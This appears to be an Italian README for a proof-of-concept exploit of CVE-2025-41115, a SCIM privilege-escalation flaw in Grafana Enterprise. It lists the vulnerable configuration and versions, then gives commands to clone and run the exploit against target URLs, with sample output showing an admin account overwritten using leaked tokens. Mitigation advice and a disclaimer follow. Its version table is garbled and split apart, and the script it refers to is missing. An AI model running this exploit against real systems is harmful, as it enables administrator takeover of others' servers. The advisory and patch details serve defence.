
CVE-2025-41115

Vulnerabilità critica di escalation dei privilegi SCIM in Grafana Enterprise
CVE-2025-41115 è una vulnerabilità Critica (CVSS 10.0) in Grafana Enterprise che interessa la funzionalità di provisioning utenti SCIM.
Quando il provisioning SCIM è abilitato e user_sync_enabled = true, un client SCIM malintenzionato può inviare un externalId numerico, che Grafana mappa erroneamente su un ID utente interno — consentendo a un attaccante di impersonare o sovrascrivere account esistenti, inclusi gli admin.
⚠️ Grafana OSS NON è interessato.
Condizioni richieste per lo sfruttamento:
enableSCIM = true[auth.scim] user_sync_enabled = true| Versione | Stato |
|---|---|
| 12.0.0 → 12.2.1 | ❌ Vulnerabile |
| 12.3.0 | ✅ Corretto |
| 12.2.1 (build corretta) | ✅ Corretto |
| 12.1.3 |
💡 I servizi Grafana gestiti (AWS/Azure/Grafana Cloud) sono stati corretti dai fornitori.
sudo git clone https://github.com/B1ack4sh/Blackash-CVE-2025-41115.git
oppure copia-incolla lo script qui sopra in un file
chmod +x CVE-2025-41115.py
python3 CVE-2025-41115.py http://10.10.13.37:3000
# or
python3 CVE-2025-41115.py https://grafana.company.com
Quando l'exploit funziona davvero (cioè il target è vulnerabile e il token è valido), vedrai un output esattamente come questo: testo
[*] CVE-2025-41115 → Targeting http://10.10.13.37:3000
[*] Trying default/leaked tokens + your token...
[+] PWNED with token → glsa_XxXxXxXxXxXxXxXxXxXx...
[+] Login as: [email protected] (any password) → you are now Admin!
[+] Full response: {
"schemas": [
"urn:ietf:params:scim:schemas:core:2.0:User"
],
"id": "1", ←←← THIS IS THE KEY LINE (UID 1 overwritten)
"externalId": "1",
"meta": { ... },
"userName": "[email protected]",
"name": {
"formatted": "Pwned User"
},
"emails": [
{
"value": "[email protected]",
"primary": true
}
],
"active": true
}
Aggiorna a 12.3.0 o a una delle release di manutenzione corrette.
Se non stai utilizzando il provisioning SCIM, assicurati di avere:
enableSCIM = false
o
[auth.scim]
user_sync_enabled = false
Cerca:
externalId numericoAssicurati che solo provider di identità fidati possano comunicare con il tuo endpoint SCIM.
Tieni d'occhio login sospetti, eventi di creazione utenti o takeover di admin.
Questa PoC è solo per test di sicurezza autorizzati e uso educativo su sistemi di tua proprietà o per i quali hai esplicito permesso scritto di testare. L'uso non autorizzato è illegale e può comportare azioni penali. L'autore e il distributore non si assumono alcuna responsabilità per un uso improprio. Applica subito la patch (≥12.0.6 / 12.3.0+).
| ✅ Corretto |
| 12.0.6 | ✅ Corretto |